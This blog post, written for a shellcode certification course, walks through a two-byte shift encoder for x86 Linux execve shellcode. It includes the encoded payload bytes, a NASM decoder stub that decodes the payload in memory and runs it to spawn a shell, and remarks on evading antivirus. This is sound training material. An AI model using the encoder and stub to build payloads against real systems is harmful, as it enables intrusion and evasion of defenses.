Linux x86 Two-Byte Shift Encoder

By August 27, 2018 August 30th, 2018 SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 4
Github repo: https://github.com/kkirsche/SLAE


Introduction

Hey everyone! Today, we’re going to discuss how to create a custom encoder. This is a pretty straight forward encoder, based off of the concept laid out from the caesar cipher. Before we dig into the meat of today’s topic, let’s lay out the assignment requirements.

Requirements

  • Create a custom encoding scheme like the “insertion encoder” that was shown during the SLAE course
  • Create a proof-of-concept, using the execve-stack shellcode that was demonstrated during the course.
  • Encode the execve-stack shellcode using your encoder and validate that it functions, as desired.

The execve-stack shellcode used can be seen below and in the assignment repository:

First things first

Why encode shellcode?

Encoding shellcode is very important to understand, and sadly it’s commonly misunderstood in my experience. Encoding shellcode, such as you do with the different encoders available within Metasploit Framework, allow you to remove potentially bad characters from your shellcode. For example, null values, carriage returns, line feeds, etc. may all be bad characters depending on the target program.

In some cases, this will bypass anti-virus, but it’s really not good at that these days. In those cases, you are much better off using something like shellcode encryption instead.

What’s the difference between encoding and encryption?

Encoding and encryption, while often mixed up by many, is an important thing to distinguish. An encoder, such as base64 encoding, hex encoding, etc. uses a known algorithm to convert data from one format to another, usually to achieve a similar goal as we’ve outlined earlier — removing bad characters for example.

Encoding though, is not encryption. Encryption occurs when some sort of secret value is involved. For example, symmetrical encryption such as AES uses a key to transform the data from the private data into it’s encrypted form, and then often uses hex encoding to ensure that the value displayed to users does not contain any non-printable characters (which it may without the encoding).

The difference to note, is that encryption actively hides our content while encoding is often easily recognizable and easily reversible.

Our Encoding Scheme

Simple single byte shift ciphers, such as the caesar cipher (which includes rotational encoding like ROT13) fall victim to frequency analysis even when we do not include a decoder stub. This means that theoretically, our shellcode could be recovered easily without even knowing what rotation we used.

To make things a little bit more difficult for the receiving party, I decided to go with a two-byte shift cipher. This means that all shellcode has to be an even number of bytes to function, but provides the benefit of protecting our payload a little bit better from that type of analysis. This probably won’t protect us from antivirus (because the decoder stub is pretty obvious), but it’s worth a shot.

Implementing our Two-Byte Shift Encoder

So we need to start off by creating an encoder. I like to start off with the encoder because it’ll be in a higher level language, so it’s easier for us to think through the implementation details. In our case, I chose to use Python to create a simple encoder script, which outputs our encoded shellcode in two forms. First, a C-formatted byte array and second, a NASM formatted byte array.

One thing to note about this is this section:

if (shellcode_len % 2) != 0:
shellcode += '\x90'
shellcode_bytes = bytearray(shellcode)
shellcode_len = len(shellcode_bytes)

Because we’re using a two-byte shift technique, we need to ensure that our shellcode is an even number of bytes. As such, if it’s not when we start, we append a no operation (NOP) to the end of it, to ensure we have an even number of bytes.

Also of interest, since we’re not going to define an explicit shellcode length, allowing this to be used for any length shellcode, we append the shift bytes to the very end of the shellcode, so that when we hit these, we’ll get a zero value back, and know that we can execute the shellcode because our decoding process is complete.


# mark the end of our shellcode with 0x19 (25 decimal) and 0x15 (21 decimal)
c_encoded += '\\x06\\x17'
nasm_encoded += '0x06, 0x17'

This outputs:


~ $ python encoder.py
Encoding shellcode...
\x37\xd7\x56\x7f\x35\x46\x79\x7f\x6e\x46\x68\x80\x74\xa0\xe9\x67\x8f\xf9\x59\xa0\xe7\xc7\x11\xe4\x86\xa7\x06\x17
0x37, 0xd7, 0x56, 0x7f, 0x35, 0x46, 0x79, 0x7f, 0x6e, 0x46, 0x68, 0x80, 0x74, 0xa0, 0xe9, 0x67, 0x8f, 0xf9, 0x59, 0xa0, 0xe7, 0xc7, 0x11, 0xe4, 0x86, 0xa7, 0x06, 0x17
Len: 28

If you compare the original shellcode with what we have below, we see that the first byte is being shifted by +6 and the second byte is being shifted by +23 (0x17 hex). So our \x31 becomes \x37 and our \xc0 becomes \xd7.

Creating an assembly decoder stub

With our encoder created, we’re ready to create a decoder. The decoder will remove the shift pattern which we created earlier and then validate when we’ve reached the end of our shift pattern by looking for a zero value.

So let’s break down what’s happening here.


global _start
section .text
_start:
jmp short jcp ; Get address of shellcode

So here we start off with our normal boilerplate code. Within the _start section, we have a jmp to jcp (shortened label name indicating that this is using the jump (j), call (c), pop (p) technique). One thing to make sure you notice here is that this _start section is inside of the .text section. While we can execute this code, as soon we try to decode it in memory, we’ll crash the program with a SIGSEGV, and we don’t want that. We’ll be using a C shellcode harness later so that we can safely decode it.

After we take the jump, we end up in the jcp section:


jcp:
call shellcode_addr
shellcode: db 0x37, 0xd7, 0x56, 0x7f, 0x35, 0x46, 0x79, 0x7f, 0x6e, 0x46, 0x68, 0x80, 0x74, 0xa0, 0xe9, 0x67, 0x8f, 0xf9, 0x59, 0xa0, 0xe7, 0xc7, 0x11, 0xe4, 0x86, 0xa7, 0x06, 0x17

Here, we have the call operation taking us to the shellcode_addr (where we’ll retrieve the shellcode address using a pop) label and then our actual encoded shellcode. After the call, our return address would be shellcode, as such this goes onto the top of the stack for use in a moment.


shellcode_addr:
pop esi ; Store address of "shellcode" in esi

After we take the call, we pop the address of shellcode off the stack into ESI. ESI is good because it’s not commonly interfered with during things like function calls. With our shellcode address in ESI, we then drop through into our final label, decoder.


decoder:
sub byte [esi], 0x06 ; Decode byte 1 at [esi] inc esi
sub byte [esi], 0x17 ; Decode byte 2 at [esi] jz shellcode
inc esi
jmp short decoder

The decoder is the heart of how we do our two byte shift. First, we subtract 6 from the value at the location which ESI points to. Note, this isn’t adjusting the memory address, this is adjusting the actual value at the address.

We then increment ESI so that we move the address up one byte, and then perform our second byte shift, subtracting 23 (0x17 hex) from the value at the location in ESI.

We then look if the zero flag is set (if it is, that means we’ve hit our final two bytes, and know we’ve reached the end of the shellcode). If we’re at the end, we jump to the shellcode to begin executing it (in this case, pop a shell). If we haven’t we increment ESI again, jump to the start of the decoder, and repeat the process until we complete decoding our shellcode in memory.

But it segfaults!

Now, if we use our normal compile harness to create a binary from our decoder, it’s going to fail with a segfault.

With that said, we still need the shellcode it produces, since it’ll include our decoder stub. As such, we run our compile script, dump the shellcode, and create a C testing harness.

Here, we have our shellcode in the shellcode character array, we print out the size, and then pass execution to the shellcode, and…. it works!

Wrapping up

Happily, this was one of the easier assignments so far in the SLAE course. The IPv6 code before definitely threw me for a bit of a loop due to the structure and address size differences. With this in mind, there is certainly more that could be done here if you wanted, maybe make the shift values configurable for example. I’ll leave that to the reader as an exercise though. With that, happy hacking!

Kevin Kirsche

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.

More posts by Kevin Kirsche

Leave a Reply